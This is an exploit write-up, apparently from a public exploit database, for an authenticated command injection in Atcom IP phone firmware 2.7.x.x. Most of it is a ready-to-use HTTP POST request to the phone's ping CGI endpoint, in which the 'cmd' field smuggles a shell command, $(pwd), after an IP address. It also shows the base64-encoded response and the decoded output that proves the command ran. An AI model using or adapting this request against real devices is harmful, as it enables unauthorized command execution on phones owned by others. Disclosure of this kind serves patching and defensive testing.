Atcom 2.7.x.x Command Injection

# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection# Google Dork: N/A# Date: 07/09/2023# Exploit Author: Mohammed Adel# Vendor Homepage: https://www.atcom.cn/# Software Link:https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html# Version: All versions above 2.7.x.x# Tested on: Kali LinuxExploit Request:POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1Host: {TARGET_IP}User-Agent: polarContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 49Authorization: Digest username="admin", realm="IP Phone WebConfiguration", nonce="value_here",uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",response="value_here", qop=auth, nc=value_here, cnonce="value_here"cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_pingResponse:{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}The value of "ping_cmd_result" is encoded as base64. Decoding thevalue of "ping_cmd_result" reveals the result of the command executedas shown below:ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'